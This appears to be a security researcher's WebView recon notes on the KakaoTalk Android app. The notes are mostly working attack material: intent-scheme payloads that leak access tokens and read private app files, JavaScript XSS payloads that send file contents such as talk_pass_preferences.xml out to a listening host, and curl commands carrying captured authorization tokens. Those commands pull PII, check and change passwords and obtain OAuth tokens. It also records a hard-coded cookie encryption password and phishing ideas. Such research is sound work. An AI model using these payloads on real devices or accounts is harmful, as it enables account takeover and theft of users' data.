kakaotalk_analysis/doc/WEBVIEW.md

WebView Recon

• Low Severity Findings
• TODOs / Digging
  • Tokens / Cookies
  • JavaScript Interfaces
  • Redirect Endpoints
  • XSS Endpoints
  • CSRF
  • File Access / Content Providers
  • DownloadListener
  • Deeplinks
  • Kakao Pay
  • Misc
• Appendix
  • Attack Vectors
  • Payloads
  • KGPopupActivity
• Resources

Disclaimer: Initial recon was performed on an older version of KakaoTalk (10.1.7).

There are a lot of TODO's in this document where one can try to dig deeper.

Low Severity Findings

• Access token leakage in non-exported MyProfileSettingsActivity via HTTP request header:
  • location.href = "intent:#Intent;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity;S.EXTRA_URL=http://10.0.2.2:8888/;end"

With this access token a couple of interesting REST APIs can be queried:

# Get phone number, e-mail address and other PII
curl -i -s -k -X $'GET' \
    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.3.8 An/11 en' -H $'Authorization: 732900c017ec4704b10f9241a3a533e800000017002173708450010fW9JnsTbx7-1f832a7f5963fd31e14e6290394909ef930ce720b31bfd546271c6b5f3cefb54' -H $'A: android/9.5.0/en' -H $'C: a327a1ad-b417-499a-abf7-48da89076e7c' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
    $'https://katalk.kakao.com/android/account/more_settings.json?os_version=30&model=SDK_GPHONE_ARM64&since=1693786891&lang=en&vc=2610380&email=2&adid=&adid_status=-1'

# Get more settings (including a Google API key and URL signing secret)
curl -i -s -k -X $'GET' \
    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Authorization: 732900c017ec4704b10f9241a3a533e800000017002173708450010fW9JnsTbx7-1f832a7f5963fd31e14e6290394909ef930ce720b31bfd546271c6b5f3cefb54' -H $'A: android/9.5.0/en' -H $'C: b2f4724a-7bac-4076-8864-021b5c9205ea' -H $'Accept-Encoding: json, deflate, br' -H $'Connection: close' \
    $'https://katalk.kakao.com/android/account/less_settings.json'

# Update settings
curl -i -s -k -X $'POST' \
    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'A: android/9.5.0/en' -H $'Adid: 0b1d9d5d-813f-4952-a3bc-b04628f04344' -H $'C: 9b5c6b99-67c2-4b7c-8047-7f3c2fbfa899' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 120' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: close' \
    --data-binary $'phone_type=1&sim_operator=310260&sim_eq=1&os_version=30&os_name=android&model=SDK_GPHONE_ARM64&screen_resolution=320x592' \
    $'https://katalk.kakao.com/android/account/update_settings.json'

# Kakaotalk "My Password"
curl -i -s -k -X $'GET' \
    -H $'Host: talk-pilsner.kakao.com' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'Talk-Agent: android/9.5.0' -H $'Talk-Language: en' -H $'Accept-Encoding: gzip, deflate, br' -H $'User-Agent: okhttp/4.7.2' \
    $'https://talk-pilsner.kakao.com/me/pin/v1/salt'

# Get Access Token for "My Kakao"
curl -i -s -k -X $'POST' \
    -H $'Host: api-account.kakao.com' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'A: android/9.5.0/en' -H $'C: 78eccae7-479f-41fe-88ca-fafd2fd07321' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Accept-Language: en' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 174' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: close' \
    --data-binary $'key_type=talk_session_info&key=106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789&referer=talk' \
    $'https://api-account.kakao.com/v1/auth/tgt'

# Upload/Change KakaoPay Face Public Key
curl -i -s -k -X $'POST' \
    -H $'Host: talk-pilsner.kakao.com' -H $'Authorization: 732900c017ec4704b10f9241a3a533e800000017002173708450010fW9JnsTbx7-1f832a7f5963fd31e14e6290394909ef930ce720b31bfd546271c6b5f3cefb54' -H $'Talk-Agent: android/10.3.8' -H $'Talk-Language: en' -H $'Content-Type: application/json; charset=utf-8' -H $'Content-Length: 469' -H $'Accept-Encoding: gzip, deflate, br' -H $'User-Agent: okhttp/4.10.0' \
    --data-binary $'{\"publicKey\":\"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvYuFDu7O05GXateNBSc5VvtboF6NzwJMaxE2/oyk3PXG2/B2UZXkcGM2kP3NfR8MYeuoiVW+zGDrZ6X8IUDgM7nIfzbHuBVo53pZCVadL89kAVbZbsafqFvgsrBUzxxhTfjYY0z/XKKRwN2YCITclyYMYnXRDiyGnYZMYvVSDMzsK1GQKp/B8xxtmArPT3gGkh2oMBR1K752M8vZAwH1sDc10nHunuOsN32cX1iD0oVKwvVBndpgleQoslIDcZCcE6X1LNE3ZvVzrP7dpoJm+hxMKh/x34byJS4NLSWKRc6aKwvRaUi0DjAAQm8YucaAg+UQDDheTOH8h6Ex2cmgKQIDAQAB\",\"keyPairHash\":\"iB91GyJSAF2dxWD7YJ72Lw2SQ7i3uWF7EB2rBCGaeQk=\"}' \
    $'https://talk-pilsner.kakao.com/alcatraz/chats/exchangeKeys'

# Get profile details
curl -i -s -k -X $'GET' \
    -H $'Host: katalk.kakao.com' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'A: android/9.5.0/en' -H $'C: a357be7d-3b11-4033-92d5-471ea225f096' -H $'User-Agent: KT/9.5.0 An/11 en' -H $'Accept-Language: en' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: close' \
    $'https://katalk.kakao.com/android/profile3/me.json'

# Get Cookie
curl -i -s -k -X $'GET' \
    -H $'Host: talk-pilsner.kakao.com' -H $'Authorization: 106dc72ab6be4f11b321ac2f09fd0f53000000170014088214200107mOCAvLuEq-472ab54a821a25a17cfc511fe8f5ea4086837931d20e0de8688ef9c3a1ad7789' -H $'Talk-Agent: android/9.5.0' -H $'Talk-Language: en' -H $'Accept-Encoding: json, deflate, br' -H $'User-Agent: okhttp/4.7.2' \
    $'https://talk-pilsner.kakao.com/drawer/user/info'

# Get friends
curl -i -s -k -X $'POST' \
    -H $'Host: katalk.kakao.com' -H $'Accept-Language: en' -H $'User-Agent: KT/10.1.7 An/11 en' -H $'Authorization: 595c420c563848109b87a2677285cbaf00000016998108925870010obQDJlP7u9-308521c7f910140c1af15a83f7ef2282864e0e4f3c1ee88e97e3964f07cdc0e2' -H $'A: android/10.1.7/en' -H $'Adid: a42e75cd-19e5-43a5-a23b-d2390c100942' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 134' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' \
    --data-binary $'removed_contacts=%5B%5D&add_friends_to_limit=false&phone_number_type=1&reset_contacts=true&type=a&manual=false&contacts=%5B%5D&token=0' \
    $'https://katalk.kakao.com/android/friends/update.json'

# Get/set OAuth token
curl -i -s -k -X $'GET' \
    -H $'Host: kauth.kakao.com' -H $'Authorization: 595c420c563848109b87a2677285cbaf00000016998108925870010obQDJlP7u9-308521c7f910140c1af15a83f7ef2282864e0e4f3c1ee88e97e3964f07cdc0e2' -H $'User-Agent: KT/10.1.7 An/11 en;KAKAOTALK' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' \
    $'https://kauth.kakao.com/oauth/authorize?client_id=24b2ff717557a8090279253242652f80&redirect_uri=kakao24b2ff717557a8090279253242652f80%3A%2F%2Foauth&response_type=code'

curl -i -s -k -X $'POST' \
    -H $'Host: kauth.kakao.com' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 271' -H $'Accept-Encoding: gzip, deflate' -H $'User-Agent: okhttp/4.9.3' -H $'Connection: close' \
    --data-binary $'client_id=24b2ff717557a8090279253242652f80&code=pYn2ksN-KH8bIaCHp3OwiM98G5xgdzkEvIgA4HDBhUT-uVcrTXzHiEgp1vA1HrERSESLXQoqJY8AAAGI3iGODg&grant_type=authorization_code&android_key_hash=S2FrYW9JIE1hc3RlciBLZXkg&redirect_uri=kakao24b2ff717557a8090279253242652f80%3A%2F%2Foauth' \
    $'https://kauth.kakao.com/oauth/token'

• I can start arbitrary components via the intent: scheme in CommerceBuyActivity (kakaotalk://buy)
  • I can exfiltrate files by sending Intents with content:// URLs to MyProfileSettingsActivity:

// Read Firebase Installation configuration
location.href = "intent:#Intent;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity;S.EXTRA_URL=content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json;end"
var data = document.querySelector('pre').innerHTML;
img = new Image();
img.src = 'http://10.0.2.2:8888?data=' + encodeURIComponent(data);

• I can open arbitrary URLs via KGPopupActivity, MyProfileSettingsActivity and CommerceShopperWebViewActivity:
  • adb shell am start "intent:#Intent\;component=com.kakao.talk/.gametab.view.KGPopupActivity\;S.url=https://foo.com\;end"
  • location.href = "intent:#Intent;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity;S.EXTRA_URL=http://10.0.2.2:8888/;end"
  • location.href = "intent:#Intent;component=com.kakao.talk/com.kakao.talk.commerce.ui.shopper.CommerceShopperWebViewActivity;S.URL=https://foo.com;end"
  • InAppBrowserActivity -> kakaointernalweb://host/q?url=https://www.foo.com&spamType=0&isPlusType=true
  • BizInAppBrowserActivity-> kakaotalk://bizwebview/open?url=http://www.foo.com
• I can execute JavaScript by:
  • Pointing to attacker-controlled URLs
  • Using the data: scheme, e.g.: location.href = "intent:#Intent;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity;S.EXTRA_URL=data%3Atext%2Fhtml%2C%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E;end"
  • Using the javascript: scheme, e.g.: location.href = "intent:#Intent;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity;S.EXTRA_URL=javascript:alert%28%221%22%29;end"
• I can access /storage, /data/data/com.kakao.talk/files, /data/data/com.kakao.talk/cache directories by opening content: URLs in MyProfileSettingsActivity, KaKaoMailDocumentViewWebActivity, and others, e.g.:
  • location.href = "intent:#Intent;component=com.kakao.talk/.activity.kakaomail.KaKaoMailDocumentViewWebActivity;S.url=content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json;S.subContent=foo;end"
  • Reading a cookie: adb shell content read --uri "content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627"
  • Using the android-app: scheme: adb shell am start "android-app://#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627\;end"
• There are a couple of JavaScript interfaces that access the user's location (see below)
• AuTODOwnload to /sdcard/Download via Chrome (app://kakaotalk/openURL?url=)
• I can access other BROWSABLE Activities or Apps via the android-app: scheme, e.g.:
  • location.href = "android-app://com.google.android.googlequicksearchbox/https/www.google.com"
• setWebContentsDebuggingEnabled is enabled for most WebViews
• XSS in com.kakao.talk.activity.cscenter.CsCenterActivity (search field)
  • https://cs.kakao.com/search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E (you need to click into the search field to trigger the alert)

TODOs / Digging

Things to try out / dig deeper.

Tokens / Cookies

• What's this cookie? -> /sdcard/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627
  • Encrypted with a hard-coded password (KaKAOtalkForever)
  • Plaintext: {"sid":"4322E936A4CC18FC7041C1DD53CAFB58934880D7F88D7A514613BC1035786F"}
  • Java Class: n50.b / CookieFileUtils
• How is the _maldive_oauth_webapp_session_key token generated? Required for a couple of REST APIs, e.g.:

# Check password
curl -i -s -k -X $'POST' \
    -H $'Host: auth.kakao.com' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Origin: https://auth.kakao.com' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' -H $'Content-Length: 99' \
    -b $'_maldive_oauth_webapp_session_key=0795170f93efe069384cedf7750c6a6d' \
    --data-binary $'client_id=88215199793288849&lang=en&os=android&v=10.1.7&webview_v=2&password=kBB5mmmE&check_type=11' \
    $'https://auth.kakao.com/kakao_accounts/check_password.json'

# Change password
curl -i -s -k -X $'POST' \
    -H $'Host: auth.kakao.com' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Origin: https://auth.kakao.com' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' -H $'Content-Length: 120' \
    -b $'_maldive_oauth_webapp_session_key=0795170f93efe069384cedf7750c6a6d' \
    --data-binary $'client_id=88215199793288849&lang=en&os=android&v=10.1.7&webview_v=2&password=kBB5mmmE&new_password=kBB5mmmE&reset_type=3' \
    $'https://auth.kakao.com/kakao_accounts/check_restricted_password.json'

@JavascriptInterface

• KvKakaoViewJavascriptInterface -> kakaoview interface
  • loadURL()
• KvKakaoTalkJavascriptInterface
  • getCurrentLocation(String str)
• BaseWebViewActivity -> webview interface
  • saveImage()
• NamecardWebActivity -> saveImage()
• JdSearchWebScriptInterface -> kakaoweb interface
  • saveImage()
  • requestLocationString(final String str)
• JdSearchWebCardScriptInterface -> kakaotalk interface
  • requestLocation()
  • requestLocationWithParam(String str)
  • updateJson(String str)
• VCBridgeJavascriptInterface -> vc interface -> used in ShakeWebActivity
  • checkKakaoCertAvailable(String str)
  • writeData()
  • readData()
• DigitalDocsWebActivity -> digitalDocs interface
  • webview_mount() (seems to load a URL)
• KakaoBizWebJavascriptInterface -> kakaoBizWebExtensionNative interface
  • executeBizWebExtension()
• kakaotalk://order (KakaoOrderActivity) -> kakaoTalk interface
  • getAuthorization()
  • getGeolocation()
  • listenSms()
  • openKakaoOrderFileChoose()
  • openKakaoOrderShortcut()
• KakaoHairshopActivity (kakaotalk://hairshop) -> kakaoTalk interface
  • getAuthorization()
  • getGeolocation()
  • getGeolocationForce()
• CommerceMakersActivity (kakaotalk://makers) -> kakaoTalk interface
  • openExternalUrl(String str)
• KGWebView (kakaotalk://gamecenter) -> Gametab interface
  • api(String str, String str2, String str3) -> available commands in KGWebViewCommands class
  • kgapi(String str, String str2, String str3
• PlusHomeWebLayout -> kakaoTalk interface
  • getGeolocation()
  • getGeolocationForce()
  • isLocationAgreed()
• CheckoutActivity -> kakaotalk interface
  • addTalkChannel(long j)
• SubscriptionIapWebActivity -> kakaoSubscription interface
  • requestInAppPurchase(String str)
• PlusEventScriptInterface
  • copyClipboard(String str, String str2)
• WebViewSignedLocationInterface -> native interface
  • reqSignInLocation(String str, String str2)
• KakaoTvPayJavascriptInterface -> kakaotv interface -> used in KakaoTvPayActivity
  • purchaseItem(String str)

Redirect endpoints

• https://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl=https://www.kakao.com
• https://accounts.kakao.com/logout?continue=https://www.kakao.com

Possible XSS endpoints

Maybe someone finds a XSS here:

• https://ccs.kakao.com/search?service=66&service=67&query=foo&locale=kr
• https://cs.kakao.com/search?query=foo
• https://cs.kakao.com/talk_helps_search?query=foo&serviceId=8
• https://devtalk.kakao.com/search?q=foo
• https://m.shoppinghow.kakao.com/m/search/q/foo

CSRF

• Test/check kakaotalk://settings
• Interesting Activities:
  • ChangePhoneNumberActivity
  • com.kakao.talk.activity.setting.p134pc.PCSettingsActivity
  • com.kakao.talk.activity.setting.p134pc.PCSettingsAuthenticationNumberActivity
  • com.kakao.talk.activity.setting.DeleteAccountAgreementActivity
  • com.kakao.talk.activity.setting.DeleteAccountCheckOthersActivity
  • com.kakao.talk.activity.setting.DeleteAccountResultActivity
  • com.kakao.talk.activity.setting.EncryptionKeysInformationActivity
  • com.kakao.talk.activity.setting.EncryptionKeysInformationDetailActivity
  • com.kakao.talk.zzng.settings.MyPinSettingsActivity

File Access / Content Providers

• Investigate FileDownloadHelperActivity
  • location.href = "intent:#Intent;component=com.kakao.talk/.activity.file.FileDownloadHelperActivity;action=com.kakao.talk.activity.file.FileDownloadHelperActivity.ACTION_FILE_OPEN;S.file_uri=file:///external_files/test.txt;end" -> Failed to find configured root that contains /external_files/test.txt
• setAllowFileAccessFromFileURLs
  • Create a JS file in Download folder (called foo.html)
  • foo.html reads file:////data/user/0/com.kakao.talk/shared_prefs/talk_pass_preferences.xml
  • Access foo.html file via content: scheme in some Webview that supports setAllowFileAccessFromFileURLs
  • XMLHttpRequest still won't work -> because it's not a file:// URL?
  • Need to be able to create/download files in/to Download folder
• Cannot steal files that cannot be rendered in a Webview (e.g., LocalUser_DataStore.pref.preferences_pb in files folder). Text files work fine: content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json.
  • CommerceShopperWebViewActivity doesn't auTODOwnload but also doesn't render binary files

DownloadListener.onDownloadStart

• Check p21.e / DownloaderTask class (com.kakao.talk.widget.webview.WebViewHelper -> processDownload() -> C42792b.m9697b() -> DownloaderTask.m16277b())
  • TODO: Try path traversal
  • Bypass DownloaderTask checks
  • Downloads files to /sdcard/Download/ directory
  • Not able to overwrite files
  • Play with data: URIs (data:[<mediatype>][;base64],<data>)
• TODO: I might be able to force WebViews to auTODOwnload files by pointing them to an attacker-controlled website. Required headers:
  • Content-Type: application/octet-stream
  • content-disposition: attachment; filename=foo.html
• Investigate com.kakao.talk.widget.webview.WebViewHelper class:
  • downloadImagesToSdCard()
    • processDownload() -> C42792b.m9697b() -> DownloaderTask.m16277b()

Deeplinks

• Check kakaolink:// links
• InAppBrowserActivity -> kakaotalk://inappbrowser
• KakaoOrderActivity (kakaotalk://order)
• kakaotalk://store
  • HTTP request to store.kakaofriends.com —> Change Location in HTTP Response Header to a different URL
• KakaoHairshopActivity (kakaotalk://hairshop)
• KakaoStyleActivity (kakaotalk://style)
• BillingWebActivity (kakaotalk://mywallet/go)
• CommerceGiftActivity (kakaotalk://gift/home?url=shortcut&input_channel_id=1017)
  • Check app:// links
• CheckoutActivity (kakaotalk://checkout/open?url=)

Kakao Pay

• Setup Kakaopay —> Get Korean phone number / SIM card
  • kakaotalk://kakaopay/billgates?url=
  • kakaotalk://kakaopay/web?url=
  • kakaotalk://kakaopay/payweb?url=
  • kakaopay://payweb?url=

Misc

• Try to send intents to com.kakao.talk.service.MessengerService (via kakaotalk://buy Webview)
• Clicking on https://auth.kakao.com in the KakaoTalk chat leads to KakaoAccountSettingsActivity
• Switch to a different Activity via continue parameter -> https://auth.kakao.com/kakao_accounts?continue=kakaotalk://main
• When opening content: URIs I end up in the null origin -> XMLHttpRequest to http scheme works here

Appendix

Attack Vector Brainstorming

• File load from insecure file locations
• Load data into WebViews via intent: scheme
• HTTP(S) MITM
• Create a Plus Friend or Kakao Business page or an Open Chat Room to deliver malicious JS
• Deep link parsing
  • Deep link —> open insecure WebView —> MITM —> run arbitrary JS code
  • Use the intent: scheme to start arbitrary components
  • Open attacker controlled website -> JS
  • Try different URL schemes (e.g., javascript:, intent:, file://, content://, data://, etc.)
• Phishing (e.g., steal credentials by showing a legitimate KakaoTalk page)
  • https://accounts.kakao.com/

Payloads

Test payloads:

<img src=1 onerror=\"alert(1);alert('XSS')\"/>

var x=new XMLHttpRequest(); x.open('GET', 'http://localhost:8000/', true); x.send();

<img src=1 onerror=\"var xhttp_comment = new XMLHttpRequest();xhttp_comment.open('GET', 'http://localhost:8000/', true);xhttp_comment.send();\"/>

Exfiltration payload:

<img src=1 onerror=\"
var xhttp_comment = new XMLHttpRequest();

xhttp_comment.onreadystatechange = function() {
    if (this.readyState == 4) {
        img = new Image();
        img.src = 'http://10.0.2.2:8888?data=' + encodeURIComponent(this.responseText);
    }
};

xhttp_comment.open('GET', 'file:////data/user/0/com.kakao.talk/shared_prefs/talk_pass_preferences.xml', true);
xhttp_comment.send();
\"/>

One-liner:

<img src=1 onerror=\" var x = new XMLHttpRequest(); x.onreadystatechange = function() { if (this.readyState == 4) { img = new Image(); img.src = 'http://localhost:8000?data=' + encodeURIComponent(this.responseText); } }; x.open('GET', 'file:////data/user/0/com.kakao.talk/shared_prefs/talk_pass_preferences.xml', true); x.send(); \"/>

KGPopupActivity

• KGPopupActivity (kakaotalk://gamecenter)
• webViewSettings.setAllowFileAccessFromFileURLs(true);
• webViewSettings.setAllowUniversalAccessFromFileURLs(true);
• Intent scheme allowed (but compontent and selector are set to null)
• There are KG, Kakao and kakaoweb JS APIs
• JavaScript-Native Bridge
  • Gametab.api("talk/toolbar/show", '', ''); —> defined in class KGWebViewCommands
• Key for Kakaotalk JavaScript SDK: 8fa1ffbc074c716c201ce0074d5f798e

Send intents in JS:

// Open Game Center (KGPopupActivity)
location.href = "intent://gamecenter#Intent;scheme=kakaotalk;end";
// Open Music Player
location.href = "intent:#Intent;action=com.kakao.talk.intent.action.OPEN_MUSIC_PLAYER;end"
// Open any URL in KakaoTalk browser
location.href = "intent:#Intent;action=foo;S.browser_fallback_url=https://foo.com;end"

Via ADB:

# Open Gift Store
adb shell am start "intent:#Intent\;component=com.kakao.talk/.commerce.ui.gift.CommerceGiftActivity\;end"

intent: parsing observations:

• Intent scheme parsing happening in URIController.d method

  • parseUri.addCategory("android.intent.category.BROWSABLE");
  • parseUri.setSelector(null);
  • parseUri.setComponent(null);
  • action is allowed
  • package opens the Playstore
  • data part is parsed for http and https schemes
  • malformed intent:// URL -> "about:blank" WebView
  • component=null -> Google Settings Backup Activity

  Resources

• CORS and WebView API

• Intent Scheme

• Defcon WebView Training

• Android security checklist: WebView

• Reviewing Android Webviews fileAccess attack vectors